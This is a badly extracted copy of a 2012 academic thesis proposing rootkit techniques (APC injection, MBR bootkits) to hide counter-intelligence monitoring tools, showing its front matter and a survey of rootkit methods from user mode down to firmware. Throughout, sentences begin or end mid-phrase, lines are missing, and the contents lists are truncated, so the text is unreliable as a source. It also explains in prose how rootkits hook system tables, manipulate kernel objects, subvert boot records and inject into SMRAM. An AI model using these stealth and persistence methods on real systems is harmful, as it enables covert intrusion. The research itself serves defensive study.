A Counter-Intelligence Method For Spying While Hiding in (PDFDrive)
A Counter-Intelligence Method For Spying While Hiding in (PDFDrive)
by
Queen’s University
Kingston, Ontario, Canada
October 2012
large scale cyber threats exploiting consumer, corporate and government systems on
a constant basis. Regardless of the target, upon successful infiltration into a target
system an attacker will commonly deploy a backdoor to maintain persistent access
current detection methods: Trident, using a kernel-mode driver to inject payloads into
the user-mode address space of processes, and Sidewinder, moving rapidly between
i
Boot Record (MBR) modifications and the primary driver that enables table hook-
ing, kernel object manipulation, virtual memory subversion, payload injection, and
ii
Acknowledgments
First and foremost I would like to thank my family, without whom I would not have
valued wisdom and experience. I also wish to thank all of the supporting faculty
that provided advice along the way: Dr. Ron Smith, Maj Gary Wolfman and Prof.
Sylvain Leblanc. A special thanks goes out to the large computer security community
that provided me insights throughout my research; in particular Dr. Dave Probert,
iii
Contents
Abstract i
Acknowledgments iii
Contents iv
List of Listings ix
Glossary xi
Chapter 1: Introduction 1
1.1 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
1.2 Problem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.3 Objective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.4 Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.6 Organization of Thesis . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Chapter 2: Background 9
2.1 Prior Rootkit Surveys . . . . . . . . . . . . . . . . . . . . . . . . . . 10
2.2 Ranking Criteria . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2.3 Rootkit Methodologies . . . . . . . . . . . . . . . . . . . . . . . . . . 12
2.3.1 User-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . . 13
2.3.2 Kernel-Mode Rootkits . . . . . . . . . . . . . . . . . . . . . . 15
2.3.3 Virtual Machine Based Rootkits . . . . . . . . . . . . . . . . . 20
2.3.4 System Management Mode Based Rootkits . . . . . . . . . . . 23
2.3.5 BIOS and Firmware Rootkits . . . . . . . . . . . . . . . . . . 25
2.4 Ranking of Rootkit Techniques . . . . . . . . . . . . . . . . . . . . . 27
iv
2.5 Asynchronous Procedure Calls . . . . . . . . . . . . . . . . . . . . . . 29
2.5.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.5.2 Rootkits Employing APC Functionality . . . . . . . . . . . . . 30
2.6 Veni, vidi, vici: Defeating Modern Protections . . . . . . . . . . . . . 32
2.6.1 Bootstrapping from the Master Boot Record . . . . . . . . . . 33
2.6.2 Windows Internals . . . . . . . . . . . . . . . . . . . . . . . . 39
2.7 Building a Forest from Trees: Putting it All Together . . . . . . . . . 45
2.8 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
Bibliography 115
v
Appendix A: Windows NT Kernel Internals 126
A.1 Data Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
A.1.1 Executive Process . . . . . . . . . . . . . . . . . . . . . . . . . 126
A.1.2 Executive Thread . . . . . . . . . . . . . . . . . . . . . . . . . 129
A.1.3 Kernel Process . . . . . . . . . . . . . . . . . . . . . . . . . . 131
A.1.4 Kernel Thread . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
A.1.5 Kernel Processor Control Region . . . . . . . . . . . . . . . . 134
A.1.6 Kernel Asynchronous Procedure Call . . . . . . . . . . . . . . 135
A.1.7 Kernel Asynchronous Procedure Call State . . . . . . . . . . . 135
A.1.8 Kernel Debugger Version Data . . . . . . . . . . . . . . . . . . 136
A.1.9 Kernel Debugger Data Header . . . . . . . . . . . . . . . . . . 136
A.1.10 Kernel Debugger Data . . . . . . . . . . . . . . . . . . . . . . 137
vi
List of Tables
vii
List of Figures
viii
List of Listings
code analysis. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
4.14 Reverse connection to exfiltrate collected intelligence. . . . . . . . . . 97
x
Glossary
(API) layer enabling the execution of routines in the context of a specific thread
asynchronously. APCs can be issued by both kernel-mode and user-mode pro-
grams.
Basic Input/Output System (BIOS) A software program that is built into the
computer hardware. It initializes the connected hardware devices and identi-
fies them and initiates the OS bootloader. It is often referred to as the boot
firmware, however it differs from firmware in that it is not stored in the Read-
Only Memory (ROM).
firmware Program code and data stored in ROM. It is used to define an interface
between a hardware component and software programs.
kernel The kernel consists of the core OS functionality, controlling all interactions
with memory and hardware.
Master Boot Record (MBR) The boot sector on a hard disk defining where the
OS loader is located.
gram where the resulting behaviour differs from the original control flow. This
unintended behavior is referred to as a vulnerability.
xii
System Management Mode (SMM) A mode that enables the management of
low-level hardware interactions, providing a completely separate memory region
this mode are not permitted to interact with memory allocated via kernel-mode,
and instead must employ system calls to interact with memory and hardware
Virtual Machine Monitor (VMM) A microkernel layer that enables the virtual-
ization or para-virtualization of an OS. This entails the emulation and control of
all hardware interactions, context switching, memory management operations,
xiii
1
Chapter 1
Introduction
We begin by outlining the motivation of this work and the problem that is currently
faced. The aim of our research—overcoming the outlined problem—is discussed fol-
lowed by the contributions of our research. This chapter concludes with a roadmap
used throughout the remainder of our research accompanied by a breakdown of the
organization of this thesis.
1.1 Motivation
at governments, companies and individuals the ability to combat the attackers has
become increasingly complicated. There is a void in the toolset for defenders to
cessful attacks that bypass an organization’s perimeter and remain persistent to ex-
filtrate the desired intelligence. Various intrusion occurrences against the Canadian
government have exposed the dangers of this type of attack. A recent example of
this includes the espionage attacks against the Canadian Finance Department and
1.2. PROBLEM 2
Treasury Board that exfiltrated sensitive information to foreign parties [2]. Attacks
such as these are not just limited to Canada, they have proven to be a pervasive issue
across the entire globe. Iranian organizations have fallen prey to continued attacks
that have exposed the sophisticated frameworks used by attackers, including collec-
tion engines—such as Duqu [3] and Flame (also known as sKyWIper) [4]—capable
located and taken offline. This is a slow process, and is often only effective at providing
a minimal understanding of the threat in order to create signatures to block and more
rapidly detect future incursions. We investigate existing and novel rootkit techniques
that can be used not only for malicious purposes, but also to satisfy the requirements
of our research in providing counter-intelligence investigators with a better toolkit to
1.2 Problem
Computer system and network attacks have become commonplace, with recent at-
tacks outlining the potential scale and sophistication possible against government,
military and corporate networks. Attackers, whether they operate under the sanc-
tion of a nation-state or act as a freelance mercenary, are after secret intellectual
property, operational strategies and citizen or customer data. Upon gaining access
to a target machine the attacker will often want to maintain persistent access for
extended periods of time. This could be used for cyber espionage and large quantities
1.2. PROBLEM 3
architecture specific extensions and modes in order to alter the system state as per-
ceived by the sysadmin or AV. They are frequently also able to locate AV software
notable in cases dealing with zombie infections, where the infected systems are part of
a large-scale distributed attack. However, when the systems contain, or have access
to, classified or sensitive material this is not always the most appropriate response.
Often it is important to analyze the behaviour of the intrusion to determine if it is a
Thus intrusions might be left in place, while limiting the information to which they
1.3. OBJECTIVE 4
have access. The system and network activity is monitored in an attempt to track
and understand the intrusion. Such an operation supports counter-intelligence.
scale of these operations being better understood and mitigated in future endeavours
[11].
detection would allow the malware to take counter measures. These counter measures
may range from ceasing communication with the attacker, communicating with an
alternate source to implicate another nation-state, or even to disable the counter-
intelligence software if possible. One of the contributions of this thesis is that rootkits
are just as effective for hiding the counter-intelligence software from malware as they
are for hiding malware from the sysadmins. Our approach is based on the concept
that installing malware detection and analysis software inside a rootkit [12] enables
1.3 Objective
understand the identity and capability of the attacker, the objective of the attack and
the scale of penetration into the network being defended. Currently the toolset for
investigating malicious intrusions is lacking, and largely remains in the static analysis
domain. By designing a framework to better interface with the malicious threat via
dynamic analysis, defenders can compile information about the attacker more rapidly
the malicious threat, and perform host-based anomaly detection to identify suspicious
activity. This will support future defensive counter-intelligence operations in which
we are interested in understanding the identity and capability of the attacker as well
as the scale and objective of the attack.
1.4 Contributions
To accomplish the objective of this research we must fully understand the internal
• The design and testing of novel stealth techniques utilizing Asynchronous Pro-
cedure Calls for Windows NT-based kernels to help interface with the threat
while allowing covert exfiltration of collected intelligence. This includes the
nique. The two separate techniques developed utilizing APC injection in-
clude:
• An analysis of the various payloads that can be utilized via the explored tech-
niques including: anomaly-based detection tools, covert channels, and dynamic
analysis modules.
1.5 Summary
In this chapter we have outlined the requirement for better techniques to deal with
the current threats plaguing cyberspace. We are primarily interested with advanced
networks. It is important to both mitigate the extent of the attack while also under-
standing the attacker’s identity and capability as well as the scale and objective of
the attack.
In order to approach this problem we must employ an amalgamation of existing
and novel techniques to evade foreign threats while enabling active intelligence collec-
We proceed in the next chapter by introducing the subject of rootkits, the varying lev-
els to which they exist, and the factors that have lead to the specific design constraints
1.6. ORGANIZATION OF THESIS 8
of our framework. We also discuss the reverse engineered data structures and kernel
functionality we utilize and provide a brief overview of APCs. Chapter 3 provides an
Chapter 2
Background
This chapter outlines the different rootkit techniques that have developed over the
years, presenting the factors influencing these technologies that affect the choices
various rootkit techniques, beginning with rootkits operating in the OS’s user-mode
and kernel-mode and descending beneath the OS, looking at rootkits exploiting the
Virtual Machine Monitor (VMM) layer, the System Management Mode (SMM), and
the Basic Input/Output System (BIOS) and firmware. With this broad overview
of rootkits we apply our ranking criteria to narrow the focus of our research to the
dows NT-based family of OS, performing the execution of code in the context of
a particular thread asynchronously. A discussion of related work employing similar
APC techniques to the ones discussed throughout this thesis is also investigated. This
evidences the potential capabilities of APCs.
2.1. PRIOR ROOTKIT SURVEYS 10
the use of Master Boot Record bootstrapping, and hooking into undocumented func-
tionality through the reversing of non-exported data types and functions.
We conclude with a discussion of how the examined capabilities enable the de-
velopment of our framework. This provides a roadmap for the remainder of this
thesis.
niques, however these studies tend to be specific to only one specific factor. Much of
the research only focuses on the stealth capability of rootkit techniques [13, 14] and
may include an analysis of the detection mechanisms that can be employed against
these techniques [15, 16]. The literature review performed in this chapter maintains
the traditional idea of stealth capability in rootkits, but it also extends this idea with
the consideration of additional areas affecting counter-intelligence work in order to
understand the best technique to not only hide but also monitor and communicate.
Other research has also looked at the impact rootkits have when digital forensics
is used on an infected machine, and the difficulties they can induce [17, 18]. These
studies often only consider data manipulation performed by the rootkits, and are
based on offline investigations as they are rarely concerned with the same set of
objectives outlined by [9] that counter-intelligence work must recognize.
2.2. RANKING CRITERIA 11
ations. This investigation was performed by Alexander et al. [19] to evaluate each of
the techniques based on three separate classifiers:
• Semantic Gap: The level of abstraction faced by the rootkit. This problem is
caused by the loss of abstraction faced when operating beneath the OS-level
[20]. The lower the level a rootkit operates at, the more difficult it is to view
high-level data.
User−Mode
OS Abstractions HW Abstractions
Kernel−Mode
Physical Device
Highest Privilege Level
Rootkits have significantly evolved from their initial designs. This section discusses
each stage of evolution in rootkit operation, beginning with a discussion of the ear-
liest versions based on user-mode. The discussion progresses through the various
privilege levels, as described in Figure 2.1, ultimately reaching the highest level at
BIOS/Firmware implementations. An overview of the computer architecture dis-
cussed throughout this section is also shown in Figure 2.1 in order to contrast the
different components that the discussed rootkits exploit with their associated privilege
levels.
2.3. ROOTKIT METHODOLOGIES 13
The original technique used by attackers for persistent covert operations on a target
system is with user-mode, or application layer, rootkits. These operate at the lowest
privilege level on a target system, referred to as Ring 3 as displayed in Figure 2.1.
User-mode rootkits accomplish their goals using techniques such as replacing a
rects API calls through the rootkit’s code in order to return modified results [21],
which is accomplished via remote thread creation or registry manipulation. These
cases modify user-mode system applications used by a sysadmin, providing him with
an altered, bogus view of the system state, hiding the attacker’s activities.
Various user-mode rootkits exploit API hooking through the use of DLL hooks. One
such example includes the Vanquish rootkit that is capable of redirecting Windows
API calls in order to hide files, folders and registry entries. This is accomplished by
injecting a malicious DLL into a target process to act as an intermediary for API calls
to intercept and filter requests for files, folders or registry entries [22]. This technique
is easily detected with modern AV solutions.
altering the contents of the registry key containing the libraries loaded when a user-
mode application initializes, specific DLLs can be loaded into every user-mode appli-
cation running as the current user [23]. This occurs when user-mode applications call
LoadLibrary to initialize the user32.dll library, a core Windows library that pro-
vides functionality for everything from user interface object creation and management
to clipboard data transfers. Every user-mode application utilizes this library. The
USER library consequently refers to the modified registry key allowing the malicious
DLL to be loaded.
Another method of manipulating Windows API calls is via the Import Address Ta-
ble (IAT). The IAT provides a lookup table for executables when they require a
function that is located outside of the process’ address space. In order to modify
as the LoadLibrary function to inject a specified DLL into the target process via the
newly created thread [24].
accessible process on the OS in order to hook the Windows API functions and redirect
the calls through the rootkit’s code [25]. This technique is also susceptible to modern
AV detection.
2.3. ROOTKIT METHODOLOGIES 15
User-mode rootkits provide the first traditional means of hiding, but their stealth
capabilities are exceedingly limited. They rely on a privilege level well below any
traditional AV solution, as is noticeable in Figure 2.1, and are thus much more liable
to be detected as their methods have been known for well over a decade. They do
not provide an effective means of data exfiltration with the outside world; all of their
communications rely on traversing the kernel and are easily detected. Finally, they
only provide a minimal overview of the target OS, as they are only privileged to
manipulate data accessible to the user they run as. This makes their view of the OS
limited, but still provides some insight into the system allowing them to rank well in
terms of the semantic gap problem.
forced to make this same move. This led to kernel-mode, or Ring 0, rootkits that
operate with the same privilege as the OS kernel and new AV solutions. Kernel-mode
rootkits use a variety of techniques to subvert the OS kernel and AV solutions. These
techniques range from hooking major system tables or APIs and patching system
Hooking Tables
Modern OSs contain numerous tables used to perform lookups for different purposes,
altering memory mappings in a target OS. These can include the Global Descriptor
Table (GDT) and Local Descriptor Table (LDT) on the Intel-based x86 architecture.
OSs also contain wide varieties of tables to provide particular functionality, such as
the Page Directory and Interrupt Descriptor Table (IDT) on Windows NT-based OS
[7]. The GDT and LDT are used across all flavours of OSs that operate on the x86
architecture, including Windows NT and UNIX. The GDT, LDT and Page Directory
tables are all used to handle virtual-to-physical memory mappings whereas the IDT
the flow of I/O requests, thereby altering the contents of the requests [26].
Another important table that can be used for rootkit purposes in Windows NT-
based OS is the System Service Dispatch Table (SSDT) which is used throughout
capability to hide processes, handles, modules, files, folders, registry values, services
and sockets [28]. Techniques utilizing SSDT hooking exist across other OS variants
as well, such as the Adore BSD 0.34 rootkit that infects both Linux and BSD systems
by overwriting various syscalls in the dispatch table in order to hide files, processes
and network connections [29].
2.3. ROOTKIT METHODOLOGIES 17
another technique that touches on a lower level also exists. If we wish to alter the
results of a given call, assuming we have the specific address of where the routine
resides, then direct modification of the machine code can be performed. This allows
Two similar techniques employing this idea include routine detouring and binary
patching. They are similar in their methods of altering the procedural representation
of machine code, but differ in their final representations. Routine detouring overwrites
a code segment with jump sequences either at the beginning (prolog detouring) or
end (epilog detouring) of the target routine [7], thereby maintaining the original size,
but not checksum, of the altered routine. The overwritten sequence is replicated at
the appropriate location in the malicious code segment to ensure the routine operates
as expected. An early rootkit that used this method is Greg Hoglund’s rootkit that
patches a detour into the Windows NT kernel to modify the SeAccessCheck routine
[30] thereby removing all restrictions [31]. Hoglund’s binary detour is only 4 bytes
in size, but is able to defeat the security protections implemented in the NT kernel.
This technique builds from earlier work by +ORC in cracking software protection
often replacing system drivers or files altogether. This is often exploited by manip-
ulating the boot process, i.e. Master Boot Record (MBR) and Basic Input/Output
System (BIOS), prior to the OS initializing. One such example is the Vbootkit that
2.3. ROOTKIT METHODOLOGIES 18
uses this technique to create custom boot sector code in order to subvert the Windows
Vista security mechanisms [33].
This is an effective technique, but it requires exact knowledge of the target system
including: kernel versions, service packs and hot patches. It can also be trivial to
detect using common AV techniques; namely computing checksums of kernel routines.
for malicious purposes. A prime example of this is the FU rootkit that hides by
manipulating the executive process (EPROCESS) structure’s double-linked list pointers
to redirect around the malicious processes and drivers so they cannot be located with
traditional means [34]. It is also able to manipulate the properties of processes in
order to change attributes such as privileges. DKOM originated from a similar rootkit
developed for Linux called the SucKIT rootkit [35] that performs binary patching of
kernel objects in an analogous fashion.
Later work revisited the FU rootkit’s design to improve the stealth capability
with the FUTo rootkit that features the manipulation of the system thread table,
and not the associated threads, whereas the FUTo rootkit can hide both. Later work
by the FUTo developers revisited detection methods against system thread table
One additional form of rootkit demonstrates virtual memory subversion. The rootkit
is called Shadow Walker and is capable of hooking and subverting virtual memory
protections. At its core is a reversal of the Linux PaX project, a kernel patch to
better protect against security exploits allowing code execution using memory [39].
Rather than protect by providing Read/Write (R/W) memory access with no exe-
cution, Shadow Walker provides execution with redirection of R/W in order to hide
executable code [40]. When a R/W attempt is made on the hidden code region the
returned frame is diverted to an untainted one, while allowing normal code execution
of the hidden code to continue. This is accomplished by exploiting the split Trans-
lation Lookaside Buffer (TLB) of the x86 architecture—the Instruction TLB (ITLB)
and Data TLB (DTLB)—descynchronizing the two components to effectively filter
nipulations. Possible detection techniques are also discussed by Butler and Silberman
where the IDT can be checked for a hook of the page fault (0x0e) interrupt [38].
2.3. ROOTKIT METHODOLOGIES 20
Kernel-mode rootkits provide an ideal level of access to the target OS as they reside
within the OS’s kernel, thus completely avoiding the semantic gap problem. The
trade-off is that stealth techniques such as hooking, patching or DKOM require in
depth knowledge of the targeted OS and are currently detectable by modern AV
software as their methods are well documented. By effectively moving lower into
the OS kernel, and developing new techniques, this trade-off can be mitigated until
the technique is detected and countermeasures are crafted. In terms of data exfiltra-
tion, kernel-mode rootkits are very effective at hiding covert communication channels,
enabled this migration. Following the previous ring-based explanation, Virtual Ma-
chine Based Rootkits (VMBR) operate in what is referred to as the Ring -1 layer,
as its primary purpose relies on allowing the guest OS to run with Ring 0 privileges
without affecting other guest OS at the same privilege level. The Virtual Machine
Monitor (VMM) layer is shown in Figure 2.1 encapsulating the OS while running
VMM Subversion
Joanna Rutkowska was the first to use this technology to subvert the OS one step
x86 architecture the performance overhead associated with virtualization can be re-
duced significantly, making the attack vector viable for long-term persistence. Other
toolsets have exploited this technique, including the SubVirt rootkit [46] as well as
the Vitriol rootkit [45].
This research has since been furthered by academic research groups. Recent work at
the Royal Military College of Canada (RMC) has investigated VMBR technology [47],
focusing primarily on a counter-intelligence framework enabling quick reactionary
measures to espionage events once they have been detected. The novel component in
this VMBR approach is in its attempt to interface with the target OS via syscall in-
terception using a method dubbed the System Call Observation Technique (SYCOT).
This is in an attempt to deal with the issue faced by all software operating beneath
the OS-level that still requires target OS data, a problem referred to as semantic gap
[20]. The semantic gap is caused due to the VMBR operating beneath the target’s
OS, and as such all abstractions provided from within the OS-level are lost and must
be reconstructed. This makes data interception from the target OS very difficult
2.3. ROOTKIT METHODOLOGIES 22
unless we know the exact signature to look for in the target OS’s memory or hard
disk.
Work in this field has also focused on utilizing this technique to investigate mal-
ware solutions that operate at the OS-level. The tool called Patagonix is designed to
detect covertly executing binaries in a target’s OS [12]. They have also attempted
to deal with the semantic gap problem, but all solutions still remain OS-specific and
custom interfaces must be developed to interface with new versions of a particular OS
or a completely separate OS. This issue hasn’t stopped research in the field however,
and various AV solutions have also migrated to the VMM layer in attempts to utilize
this research in looking for anomalies in the OS. Virt-ICE is a step in this direc-
tion, operating in the VMM-layer while hooking the INT3 (0xcc) interrupt used for
generating software interrupts with debuggers in order to bypass the anti-debugging
VMBR Overview
This technique provides a unique stealth capability and has a large following in the
academic and research communities, but has failed to gain traction outside of these
communities due to the complexity of developing stable solutions. To properly employ
a VMBR intimate knowledge of the target’s hardware and OS must be known, which
requires heavy reconnaissance and may not be possible at all depending on the actual
however provide a reliable and effective communication channel for data exfiltration
2.3. ROOTKIT METHODOLOGIES 23
as they control all hardware interaction between the target OS and hardware devices.
oped. This move again utilized architecture-specific functionality on the x86 branch
of architectures, the System Management Mode (SMM). Prior to delving into an ex-
planation of the SMM it is first important to take a look at the different operating
modes available on the x86 architecture. Up until now our discussion has focused
solely on Protected Mode, but as of the SL family of Intel processors three operating
• Protected Mode: The mode in which all instructions and architecture features
are available such as virtual memory and paging. Memory protection is provided
giving rise to the privilege levels at the OS-level; i.e. kernel-mode (Ring 0) and
• Virtual 8086 Mode: This is not a separate mode in itself, rather an extension
of Protected Mode enabling direct execution of Real-address Mode to provide
ment.
2.3. ROOTKIT METHODOLOGIES 24
As we can see, discussions of the kernel-mode and user-mode rootkits are specific to
Protected Mode. VMM-based rootkits also operate in Protected Mode in order to
provide paging. SMM provides a different avenue for rootkit infection and as such we
will provide a more in depth discussion of this mode.
The SMM is an operating mode of the processor used to control low-level hardware
space and execution environment that cannot be accessed by the target OS [51].
The SMM resides one level of privilege higher than the virtualization layer, thereby
operating in the Ring -2 layer.
The first proof-of-concept rootkit using the SMM functionality of the Intel family of
architectures overcame the hurdles of having to find a method of injecting code into
the SMM memory region from a lower privilege level while being able to intercept
data from the target OS. This is overcome by manipulating the memory control in
order to make the SMRAM region visible and writeable, copying the rootkit code
into the SMRAM and finally clearing the changes made to the memory controller to
make the SMRAM region invisible again [52]. Next Interrupt Requests (IRQ) are
rerouted to the SMM rootkit code and forwarded to the CPU via the Intel Advanced
Programmable Interrupt Controller (APIC) Inter Processor Interrupt (IPI) handler
to complete the OS-level interrupt handling [52]. This enables the interception of
2.3. ROOTKIT METHODOLOGIES 25
keystrokes, network sockets, and anything that can be intercepted in kernel-mode via
an IDT hook. This entire technique is only effective if the SMRAM Control register
SMBR Overview
SMBR possess a similar stealth capability to VMBR, but they have significantly
reduced code footprints as they don’t require the same overhead as the virtualization
layer’s hypervisor. Unfortunately, they too suffer from the semantic gap issue and
must provide custom interfaces for any given target OS, thus making them difficult
to adapt for general purposes. They also rely heavily on the underlying architecture,
making their entire code base dependent on the target machine. Finally, in order to
provide an effective means of data exfiltration a proper networking stack must either
be created or manipulated in the Protected Mode operating environment.
As the race for the highest privilege level continued each layer came under investiga-
tion, migrating even further into the innards of computer systems. This commenced
the development of rootkits that infected the BIOS and PCI device firmware in the
lowest layer of computer systems, what is commonly referred to now as Ring -3.
Initial research by eEye Digital Security presented a unique technique to inject kernel-
mode code into Windows NT-based OS via modified bootstrapping. This allowed
them to both reserve a segment of memory for the malware as well as hook the
2.3. ROOTKIT METHODOLOGIES 26
appropriate interrupts in order to alter the binaries that are loaded by the OS and
falsify the reported available memory to hide the malicious code [53]. Although this
offers an ideal bootstrap mechanism; the process used to make the OS loader as well
as various other OS components memory resident during system start-up. As such it
Firmware Manipulation
Even more recent work has lead to attacks on Intel’s Active Management Technology
(AMT); a technology for remotely managing a system’s BIOS and firmware. The at-
tacks allow for remote injection and execution of malicious code in the AMT memory
region, enabling Direct Memory Access (DMA) into the target OS [54]. Perform-
ing DMA using this method allows the exploration or alteration of the target OS.
This technique is significantly limited by the employment of Intel’s Virtualization
Technology for Direct I/O (VT-d), a later extension of the VT-x processor extension.
Hardware Interface
Recent work has used hardware devices to interact with a system via unintended
hardware vectors. One such example is a project at RMC with the primary focus of
exploiting unintended USB channels in order to create two-way communications with
a target system. This work uses two different unintended channels to exfiltrate data:
the keyboard LED channel which uses a combination of the Scroll Lock, Caps Lock
2.4. RANKING OF ROOTKIT TECHNIQUES 27
and Num Lock as well as the audio channel which uses waveform files to communicate
data with the target OS [55].
As we see with the wide range of attacks at the BIOS and firmware levels, these
tend to be architecture or even processor specific and cannot be reused for general
cases. This makes them costly solutions to develop, and even more costly to test,
deploy and maintain. Although they provide some of the best stealth capabilities
amongst all of the classifications, they also complicate the ability to gather intelligence
from the target OS due to the semantic gap. They can prove effective, depending
on the infection point, for data exfiltration operations. This is dependant on the
vector they infect; if the rootkit resides in the firmware of a PCI network interface
then data exfiltration is trivial, but a direct BIOS modification can prove difficult to
Considering all of the possible rootkit classifications presented in Section 2.3 we can
now construct a matrix comparing the three factors outlined in Section 2.2. These
include the stealth capability of rootkits residing in each classification, the semantic
gap problem regarding how accessible data on the target OS is to the rootkit, as well
as the data exfiltration capability of the rootkit in being able to communicate with
the outside world. Table 2.1 shows the results compiled based on the observations for
each classification.
2.4. RANKING OF ROOTKIT TECHNIQUES 28
Measurement
Rootkit Classification Stealth Semantic Data
Capability Gap Exfiltration
User-Mode Rootkit poor good poor
Kernel-Mode Rootkit good very good very good
VMBR very good very poor very good
SMBR very good very poor poor
BIOS/Firmware Rootkit very good very poor good
As is clear, when we subvert deeper into the hardware the stealth capability im-
licious context. In a counter-intelligence context this isn’t the case as we are also
interested in the other criteria: the ease of access to high-level OS types and for-
its offer an ideal solution across the board, providing an effective data exfiltration
means while operating from within the kernel thereby circumventing the semantic
gap problem altogether. These are two important points that denote the kernel-mode
classification as the entry point of choice for counter-intelligence purposes. Moving
further down in the hardware requires mechanisms for dealing with the semantic gap
and data exfiltration problems, solutions that are often costly in terms of development
lifecycle timelines and the footprint of the developed solution in binary size.
This section provides a brief summary of APCs as well as a survey of their current
2.5.1 Overview
Communication between system drivers, processes, threads and any other executable
entity requires a means of communicating with other components. One such example
necessitating this requirement is Input and Output (I/O). Two synchronization types
exist at the core of the I/O concept: synchronicity and asynchronicity. In synchronous
I/O a program generates an I/O request and enters a wait state until a response is
received. In asynchronous I/O the program is able to continue execution after an
I/O request is generated. Once a response is received the current executional state
of the program is interrupted and the result of the I/O request is processed. This
questing program and executing within their context. This I/O completion example
outlines just one of the various roles APCs serve in Windows. They also handle pro-
cess and thread creation and destruction, timers, notifications, debugging, context
switching, error reporting, as well as a variety of other tasks [56].
the OS—both kernel-mode and user-mode—in order to evade static detection while
offering direct access to the entire contents of the system with the ability to exfiltrate
from any point. They also avoid creating significant overhead in terms of CPU usage
and blend into the plethora of other APC activity making them difficult to detect with
dynamic techniques. These factors, when compared with the results of our survey
as presented in Section 2.4, make APCs an ideal mechanism for employment in our
research.
and threads from kernel-mode and injection of code in user-mode between other user-
mode processes and threads. The remainder of this section will discuss the current
use of APCs in deployed malware.
functions in the context of a specific thread. This is useful for performing the covert
execution of code in innocuous or targeted applications. A thorough discussion of
TDL4
TDL4 has proven throughout the years to be one of the most advanced criminal
rootkits produced. The constant evolutionary cycles and use of rootkit techniques
2.5. ASYNCHRONOUS PROCEDURE CALLS 31
at the frontier of their field have made it increasingly difficult to irradicate. This is
interesting to us for three reasons as presented in [57]:
• The use of a bootkit for controlling the start-up process of the system and
injecting the loader into the Windows kernel.
The APC injection attack employed in TDL4 is similar to the one developed inde-
pendently in our research, with a discussion presented in Chapter 3. The capabilities
where information such as the node IDs or files are stored as MD4 hashes. This makes
the network robust, able to restructure itself if any core nodes have their connections
severed, differing from client-server architectures in which a core node failure has
catastrophic consequences that behead the botnet. Any further discussion of the
C&C is outside the scope of our work.
ZeroAccess Rootkit
ZeroAccess, first discovered in late 2009, is another rootkit employing APC injection.
Also known by the aliases Max++ and Smiscer, this crimeware rootkit boasts sophis-
ticated functionality including modern persistent hooks, low-level API manipulation
for protecting hidden volumes, AV bypassing techniques, and the use of APCs to per-
form kernel-mode monitoring of all user-mode and kernel-mode processes and images
as well as injection into any processes or threads [58].
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 32
The ZeroAccess rootkit uses a similar method for APC injection as TDL4 and is
discussed in further detail in Chapter 3. The method used for the monitoring of user-
Magenta Rootkit
migration techniques to rapidly move around memory using APCs. This is based on
employing APCs to inject into a process or thread upon loading on the system, and
once the rootkit completes in the the context of the particular process or thread it
continues the attack by propagating to a new context [60].
No evidence of the existence of this hypothetical rootkit exists, and as such much
of the research presented in this paper builds on the ideologies proposed in the Ma-
genta specifications. This is mainly in regards to the Sidewinder injection technique
presented in Chapter 3.
While APCs are shown throughout subsequent chapters to satisfy the requirements
outlined in Section 2.2 we must first consider how to gain control of the system and
As described in Section 2.3.5, MBR rootkits, also known as bootkits, are a power-
ful tool employed to alter the boot process of a target system. A modified boot
process guarantees that we control the entire start-up process, and can manipu-
late the OS loader and kernel during initialization. This is very useful for specific
purposes; namely bypassing new protection mechanisms added to the 64-bit line of
Windows-based OS. Throughout this section we will outline the execution paths of
MBR rootkits and the purposes for which they are employed.
Bootkit functionality allows a system to be hijacked prior to the loading of the
primary OS. This is achieved by loading the bootkit from the primary MBR record and
persisting through the initial loading in real-mode, referred to as bootstrapping. The
bootkit must be able to persist through the transition from real-mode to protected
mode, at which point the primary OS is loaded and the bootkit is free to control
the initialization process. This enables the injection of any unsigned code into the
such as the base address of the processor control region or system thread table. This
technique has been shown to work across the range of NT-based kernels developed
from NT 5.0 onwards. A timeline of the Windows NT-family of OS is shown in Table
2.2. Bootkits have been documented across the entire range of NT 5.0 to 6.1 [61],
2.6. VENI, VIDI, VICI: DEFEATING MODERN PROTECTIONS 34
Windows 7
2009-10-22 6.1
Windows Server 2008 R2
Windows 8
2012-10-15 6.2
Windows Server 8
and can be modified to support any OS flavour, such as UNIX or BSD. Bootkits
have also been shown to be successful with pre-release candidates of the next version
of Windows—Windows 8 and Windows Server 8—based on the NT 6.2 kernel [62].
This makes them an ideal injection vector as they cover a comprehensive subset
of Windows, including future versions. As such, this provides an ideal method for
bootstrapping persistent code. We will discuss this technique throughout the rest of
The sophistication of this technique has been outlined in recent years by the
TDL4 malware; more specifically, in regards to its bootkit functionality as discussed
by Matrosov and Rodionov [63, 64]. It is one of most advanced threats spreading
across the Internet, and has proven incredibly difficult to dismantle the associated
botnet, primarily due to the difficulty in removing it from infected systems without
completely destroying their MBRs. At its core is eEye’s BootRoot technology [53]
with constant modifications throughout each iterative version of the TDL framework.
At the heart of a bootkit is a modified MBR layout that moves the primary OS
record into a different location while overwriting the original record to redirect flow
through the bootkit loader and altering the active partition to the bootkit’s record
while unsetting the primary OS’s active setting. The new active partition is initialized
as the Volume Boot Record (VBR). By controlling the MBR and associated hard disk
layout the bootkit is free to allocate a hidden region at the end of the disk where
the malicious components can be stored. Following these modifications, the system
boots the new bootkit record and passes control to the VBR, allowing the bootkit to
control the OS loader’s initialization routine before it becomes resident in memory.
The VBR loads the 16-bit real-address mode loader—the initial program that is
executed immediately after powering on—from the hidden partition and hooks the
BIOS interrupt 13h—the interrupt that performs sector-based disk R/W—in order
to patch the Boot Configuration Data (BCD) and OS [64] by manipulating R/W
accesses, and continuing to load the primary OS’s VBR in order to initialize the
target OS. This is depicted in Figure 2.2 with the different modules broken down in
Table 2.3.
